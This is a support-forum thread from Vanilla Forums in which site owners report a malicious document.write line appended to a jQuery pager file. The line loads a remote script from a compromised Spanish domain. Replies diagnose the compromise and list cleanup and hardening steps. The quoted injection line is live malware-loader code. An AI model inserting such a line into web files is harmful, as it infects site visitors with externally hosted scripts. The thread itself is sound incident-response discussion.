Blog Documentation Book a Demo
Please upgrade here. These earlier versions are no longer being updated and have security issues.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.

Odd javascript injected

smoessmoes New
edited January 2014 in Vanilla 2.0 - 2.8

Hey guys,

I am member of a graphic community, which uses vanilla as the software of their choice.

Today the loading speed really sucked. After some investigation I found an odd html request going to chefacasa.es in the background. Chefacasa does not have anything in common with the graphic community, which lead me to the conclusion, that this request is not supposed to happen.
I investigated the requests and saw that even a cookie communication takes place. Further research showed that this request happens in

/board/js/library/jquery.gardenmorepager.js?v=2.0.18.1

The following lines have been added to the end of the file:

/*92822e*/
document.write("<script src='http://mallorca.chefacasa.es/zYWprFvt.php?id=118610534' type='text/javascript'></" + "script>");
/*/92822e*/

This seems like corrupted code. Since the community is really small and kind of the more personal communities, I trust the administrators. I think they did NOT inject any bad code. However, I have already gotten in touch with them.

Does anyone here have any experience with what happens here?

Comments

  • x00x00 MVP

    @smoes you sever is compromised, this is maleware. You need replace the framework files, and many file could be infected. Dont forget to do backups.

    You can trust your admins, but on the other hand that doesn't mean that they practiced good home security.

    That being said forum admin, would have access you your sever, only the web framework.

    There are two way you file can get maliciously get written to.

    1. A hole in the software, which can be used inject code into file. However good file management can reduce this risk as those file should allow write access ordinarily.
    2. An infected user who has access to you server unwittingly delivering the payload.

    grep is your friend.

  • smoessmoes New

    I feared that. It also seems, that chefacasa.es has been corrupted. I do not think they know what is going on. I'll give them a hint. Thank you for your replay, I also will manage to get the forum updated.

  • x00x00 MVP

    I mirror @Shadowdare however like I said this is not a substitute fro good practice in server management and security practices.

    grep is your friend.

  • ShadowdareShadowdare MVP
    edited January 2014

    It is possible that they have been a victim of an unknown exploit that someone found in Vanilla, but they are using 2.0.18.1, which was released back in 2011. There have been many updates with security patches since then. They should upgrade to 2.0.18.10 as soon as possible. @x00 posted some good advice just now that the administrators of the website should focus on as well.

    Edit: double posted accidentally.

    Add Pages to Vanilla with the Basic Pages app

  • smoessmoes New

    @x00: Thank you for your answer. Do you think it is safe to naively backup the database, erase the data on the server and install the current vanilla? Or could some corrupted have already been stored in the database? Additionally, everyone need to change their passwords, for sure.

  • x00x00 MVP

    they need to follow the documentation on upgrading.

    grep is your friend.

  • amcarcelesamcarceles New

    Hi,

    My website was infected in 16 January for the same code.

    I don't use vanilla, i think that a user who use ftp access is infected by malware, i think it is the most probally.

    Only the .js archives was modified and i restore this.

    Any suggestion?

    Thanks,

  • x00x00 MVP
    edited January 2014

    @amcarceles said:
    Hi,

    My website was infected in 16 January for the same code.

    I don't use vanilla, i think that a user who use ftp access is infected by malware, i think it is the most probally.

    Only the .js archives was modified and i restore this.

    Any suggestion?

    Thanks,

    Yes

    1. Scan computers of those with access, with up to date AV
    2. Change all password and certs to the site
    3. Replace web framwork with clean copy as much as is possible, after backing up to a benign area.
    4. Set up sever security like firewall, av (e.g. clam), and modsec2 (you may need hosts help with this)
    5. Ensure you are doing the file permissions an ownership right (so often this is done badly), server management is not without learning curve so there is no excuse for not learning. If in doubt do a course, or get a book.
    6. Grep file for telltale malware, this is tricky becuase even if you use the malware website or insert code, often the paylaod is hidden through encoding such as base64, url encode, gzip, and there are legitimate uses.
    7. Regularly scan all computers.
    8. If possible limit the access points an methods, disable unsecured ftp in favour of ssh/scp/sftp

    grep is your friend.

  • amcarcelesamcarceles New

    Thanks for all.

    Best regards.

Sign In or Register to comment.